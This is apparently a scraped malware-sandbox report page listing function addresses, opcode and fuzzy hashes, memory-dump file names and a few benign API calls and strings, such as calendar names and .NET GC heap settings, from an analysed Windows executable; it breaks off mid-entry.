Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1d6c5c74579766a181c76732d0e982c6beea5bccfddb835f43d11907d24d000
Instruction ID: 2bc8ea784e96d2f2251ee3bad2c926018eb2ae9fe1aea2f31acc848bae936fd0
Opcode Fuzzy Hash: c1d6c5c74579766a181c76732d0e982c6beea5bccfddb835f43d11907d24d000
Instruction Fuzzy Hash: 8261E322A2AF854AD946CF7590506789255BF967C6F548332ED8F73780EF3EE192C200

Function 00007FF6C75D0200 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c5e064a75470d3b12434700b37e535a9a449cf43c98d28f8e1c4881788e2503
Instruction ID: ae27e51d484c7233ccd26a1cd3ab2e695301775f495a71f4b8cac6dd0f54d034
Opcode Fuzzy Hash: 3c5e064a75470d3b12434700b37e535a9a449cf43c98d28f8e1c4881788e2503
Instruction Fuzzy Hash: F8512722A056C59AE724DF26E8455B977A0EF68B84F988035FE8CC3B55EF3CD581C340

Function 00007FF6C7513640 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 037180d382d50411797ef5447beba6102d2d9aae5c3127ec27b5573139ad0381
Instruction ID: 024ba6181353fd5b56c9bf3e4093e4736eccc6af0030d80dbe2a0ed290168e10
Opcode Fuzzy Hash: 037180d382d50411797ef5447beba6102d2d9aae5c3127ec27b5573139ad0381
Instruction Fuzzy Hash: 74612A32E24F8146EA56CF75A441978A29AFF817C6B989331EDCFA2640DF3DE191C700

Function 00007FF6C75ACC30 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8488435c80d20a63b5b51d94c773dc6c83ce4d876cdd784b59539f6ecbcefddf
Instruction ID: f134e1784315e127b642e4e62cf7642c5d15bd63e1a6bde8c7510e889ba6822d
Opcode Fuzzy Hash: 8488435c80d20a63b5b51d94c773dc6c83ce4d876cdd784b59539f6ecbcefddf
Instruction Fuzzy Hash: C2518362B18506C2FF659F2AD8602786750AF94FD2F944031DA8EC77E5DE2DE881D310

Function 00007FF6C75080D0 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af0f8f658ed146b7bde4c3ea3541af9f91da255481e376bce69b8206bf11aae6
Instruction ID: 99c0d09fd3f5734d4550b3130b4ce4cc951e802bb7e2bbb2ed541675160f53a3
Opcode Fuzzy Hash: af0f8f658ed146b7bde4c3ea3541af9f91da255481e376bce69b8206bf11aae6
Instruction Fuzzy Hash: E0414761F2CB8A81ED458F77A941A3451526F5A3D6F68CB32E8EEE63D1EF3D70805200

Function 00007FF6C7516610 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f371b7c663320aac0712d55089f2ff7daf330af024b6290ddde3f6ee4752e1a
Instruction ID: 756467e53f9512d3460ee0620b637b9aa27a439da5145173eb400981ff563a2b
Opcode Fuzzy Hash: 9f371b7c663320aac0712d55089f2ff7daf330af024b6290ddde3f6ee4752e1a
Instruction Fuzzy Hash: A241AF6AB18B8A86EE00CF0AD5541A86371FB48BC2F895032DE9EDB755DF3CE552C700

Function 00007FF6C75D4450 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f369d52a6617cb0b410c6854dde9fc91c82fa898c3b7573e9b41fa6fd70f80a6
Instruction ID: ca4d0a222050f524efc2311785c6ccc26d49ba730368c884ac12e27ebaae1784
Opcode Fuzzy Hash: f369d52a6617cb0b410c6854dde9fc91c82fa898c3b7573e9b41fa6fd70f80a6
Instruction Fuzzy Hash: 85312812F0919686EB14AF26D9801BD56A1AF94FC6FD48034EDAEC77D6DE3CE8428344

Function 00007FF6C75B2AC0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed14c80dd863059f2dff2c32daa8a57b105c1426a02afba91e4b980da70f0663
Instruction ID: 7190945f38226d9a1d7942957462a4485fc1368812a4b3605e79ed3ea7e9c4e1
Opcode Fuzzy Hash: ed14c80dd863059f2dff2c32daa8a57b105c1426a02afba91e4b980da70f0663
Instruction Fuzzy Hash: 94419D32B04BA489F715CFB5E8406ED37B5BB58358F65812AEE8D97A08DF34C592C700

Function 00007FF6C7521470 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 84561d1d573fde311a2d707e79fc372032f8b9738f604961ab49bf565c1bdabe
Instruction ID: eaec8fd1939e60f53c2ac72fa005cdc5d3fa8d46877dc3b1653702358565c47c
Opcode Fuzzy Hash: 84561d1d573fde311a2d707e79fc372032f8b9738f604961ab49bf565c1bdabe
Instruction Fuzzy Hash: 1521CC23B2864242EFA48F7DA2D5A7F1351EB897C2F846071DE8D87E46DD1DD5914A00

Function 00007FF6C75D7A90 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 221cf158b9a98e13d59b20ce11f85cd83d7d464265b0073024cff9ca69588a45
Instruction ID: ee9511b4bbe9d1aa4ec732f8d32a86f45c1f55b153b37757cf25914d19b460e1
Opcode Fuzzy Hash: 221cf158b9a98e13d59b20ce11f85cd83d7d464265b0073024cff9ca69588a45
Instruction Fuzzy Hash: 0B110A23B0564289E615AF62F9811BE9311AF957D6F84C831DF8C8B786DE3CD5C2C304

Function 00007FF6C757F9C0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8062c5b0bfe5bc4dfaf79245516a6f0a8f2a6c954b61e061f0a9d370f9ed3bdd
Instruction ID: b152e7e189ba0d60a5c9ef3b017cd64ae5b8a678e3d751ca18e2201f5c2c68e0
Opcode Fuzzy Hash: 8062c5b0bfe5bc4dfaf79245516a6f0a8f2a6c954b61e061f0a9d370f9ed3bdd
Instruction Fuzzy Hash: AAF0FE04F1951A46F90CBF3258262FF82610F97B82F64E834EA9E9B787DD1CE4570344

Function 00007FF6C757FAA0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13412aaf4960266ba0ca3712be346c71a13c8dc86ffbd22705df66a78fb92546
Instruction ID: 7715165848ed0d85a62aeab36a2376253e3709f3a4196899b862991fc4de66db
Opcode Fuzzy Hash: 13412aaf4960266ba0ca3712be346c71a13c8dc86ffbd22705df66a78fb92546
Instruction Fuzzy Hash: 3DE08604E1810B46F90CFF6254662FBC1611F97782F54E430EA9E977D7DE2DE4024340

Function 00007FF6C75590A0 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 136COMMON

Download Yara Rule

APIs

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6C7559193
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6C75591B0

Strings

persian, xrefs: 00007FF6C7559217
buddhist, xrefs: 00007FF6C75591C3
dangi, xrefs: 00007FF6C75591FD
japanese, xrefs: 00007FF6C75591A6
roc, xrefs: 00007FF6C7559265
islamic-umalqura, xrefs: 00007FF6C755924B
gregorian, xrefs: 00007FF6C7559189
hebrew, xrefs: 00007FF6C75591E0
islamic, xrefs: 00007FF6C7559231
calendar, xrefs: 00007FF6C7559102

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: _stricmp
String ID: buddhist$calendar$dangi$gregorian$hebrew$islamic$islamic-umalqura$japanese$persian$roc
API String ID: 2884411883-3649728362
Opcode ID: 5c4252158990072a2c8dbf7d618486f637b8a275c6e4f6a82dc01d2d222f2064
Instruction ID: d08f724560dc7991e839451e2396eeff2557b7294cd2cc0c7e5e9af9954c7578
Opcode Fuzzy Hash: 5c4252158990072a2c8dbf7d618486f637b8a275c6e4f6a82dc01d2d222f2064
Instruction Fuzzy Hash: 87516C65A1C68395FA909F16F8103B97BA0FF84786F812032ECCEC6691EF6DE445E740

Function 00007FF6C74FC1A0 Relevance: 24.1, APIs: 8, Strings: 8, Instructions: 101stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6C7502967,?,?,?,?,00007FF6C74FB845), ref: 00007FF6C74FC1DE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6C7502967,?,?,?,?,00007FF6C74FB845), ref: 00007FF6C74FC206
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6C7502967,?,?,?,?,00007FF6C74FB845), ref: 00007FF6C74FC226
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6C7502967,?,?,?,?,00007FF6C74FB845), ref: 00007FF6C74FC246
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6C7502967,?,?,?,?,00007FF6C74FB845), ref: 00007FF6C74FC266
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6C7502967,?,?,?,?,00007FF6C74FB845), ref: 00007FF6C74FC28A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6C7502967,?,?,?,?,00007FF6C74FB845), ref: 00007FF6C74FC2AE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6C7502967,?,?,?,?,00007FF6C74FB845), ref: 00007FF6C74FC2D2

Strings

GCHeapHardLimitPOH, xrefs: 00007FF6C74FC25C
GCHeapHardLimitPercent, xrefs: 00007FF6C74FC1FC
GCHeapHardLimitLOHPercent, xrefs: 00007FF6C74FC2A4
GCHeapHardLimitLOH, xrefs: 00007FF6C74FC23C
GCHeapHardLimitPOHPercent, xrefs: 00007FF6C74FC2C8
GCHeapHardLimit, xrefs: 00007FF6C74FC1D7
GCHeapHardLimitSOH, xrefs: 00007FF6C74FC21C
GCHeapHardLimitSOHPercent, xrefs: 00007FF6C74FC280

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: strcmp
String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
API String ID: 1004003707-945519297
Opcode ID: bd652d5be0480d2eb31566d04321b99b92d141b06253939b4d1c7caa1d773059
Instruction ID: 499eda26e057669b5ee8fc5eb62b7408eed47bc4106b125f8b09564d87267bf3
Opcode Fuzzy Hash: bd652d5be0480d2eb31566d04321b99b92d141b06253939b4d1c7caa1d773059
Instruction Fuzzy Hash: 40411E14E0CA5380F9909F26A9401B56361AF457F6F888331DCFDD76E6EF2CE9469740

Function 00007FF6C74FB3B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00007FF6C74F5007), ref: 00007FF6C74FB3D3
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF6C74F5007), ref: 00007FF6C74FB3E8
GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF6C74F5007), ref: 00007FF6C74FB3F5
InitializeContext.KERNEL32(?,?,?,?,?,00007FF6C74F5007), ref: 00007FF6C74FB433
GetLastError.KERNEL32(?,?,?,?,?,00007FF6C74F5007), ref: 00007FF6C74FB441
InitializeContext.KERNEL32(?,?,?,?,?,00007FF6C74F5007), ref: 00007FF6C74FB495

Strings

kernel32.dll, xrefs: 00007FF6C74FB3CC
InitializeContext2, xrefs: 00007FF6C74FB3DE

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
String ID: InitializeContext2$kernel32.dll
API String ID: 4102459504-3117029998
Opcode ID: 5b0b1da1beb1025bc6a73dbe140730006c494257f9538ff4ec3670d0ad47e40c
Instruction ID: 7ccc7febf66306f4f740c758669c48f91ec1f797d24ccbf8bce0b998d48d290e
Opcode Fuzzy Hash: 5b0b1da1beb1025bc6a73dbe140730006c494257f9538ff4ec3670d0ad47e40c
Instruction Fuzzy Hash: DC315821A09B8682EE549F66B540279A390FF49BD2F484436DDCD82BA4DF7CE486E700

Function 00007FF6C7530FE0 Relevance: 9.2, APIs: 6, Instructions: 151COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF6C7531090
DebugBreak.KERNEL32 ref: 00007FF6C75310CD
DebugBreak.KERNEL32 ref: 00007FF6C75310E8
DebugBreak.KERNEL32 ref: 00007FF6C753111D
DebugBreak.KERNEL32 ref: 00007FF6C7531138
DebugBreak.KERNEL32 ref: 00007FF6C75311A9

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 5d73b6675c1853df630bb6c88506b6e80ad5f9561737fbd2e3aae4c93d19f0ff
Instruction ID: 4edffcf89c435ab950cb2e564daac35ec9ecd45bb74aef3c854b4a76a30fc5c5
Opcode Fuzzy Hash: 5d73b6675c1853df630bb6c88506b6e80ad5f9561737fbd2e3aae4c93d19f0ff
Instruction Fuzzy Hash: E851B772A09E8286EF159F61C4402FD67A5FF84BD6F964136CA9D873A1DE3CE581C380

Function 00007FF6C7531DE0 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF6C7531FB1,?,?,0000023AE2EF8090,00007FF6C75314E2), ref: 00007FF6C7531E89
DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF6C7531FB1,?,?,0000023AE2EF8090,00007FF6C75314E2), ref: 00007FF6C7531EA1
DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF6C7531FB1,?,?,0000023AE2EF8090,00007FF6C75314E2), ref: 00007FF6C7531EB9
DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF6C7531FB1,?,?,0000023AE2EF8090,00007FF6C75314E2), ref: 00007FF6C7531ED7
DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF6C7531FB1,?,?,0000023AE2EF8090,00007FF6C75314E2), ref: 00007FF6C7531EFC
DebugBreak.KERNEL32 ref: 00007FF6C7531F30

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: eb5a1da3c55d9acfe23894c72031d4decde521b88f1bcb182cc320728f4e60f2
Instruction ID: 95afc273041d827c8977c77cc7a2b924f0d05a144e23a90dcea0445148f5686c
Opcode Fuzzy Hash: eb5a1da3c55d9acfe23894c72031d4decde521b88f1bcb182cc320728f4e60f2
Instruction Fuzzy Hash: 7541B662A0DAC142E751AF7190001BEAB91BF44BD6F594138DECD876E6CF3CD481C791

Function 00007FF6C74F5260 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6C74FB6A0: GetCurrentThreadId.KERNEL32 ref: 00007FF6C74FB6A4

GetCurrentProcess.KERNEL32 ref: 00007FF6C74F52A6
GetCurrentThread.KERNEL32 ref: 00007FF6C74F52AE
DuplicateHandle.KERNEL32 ref: 00007FF6C74F52D2

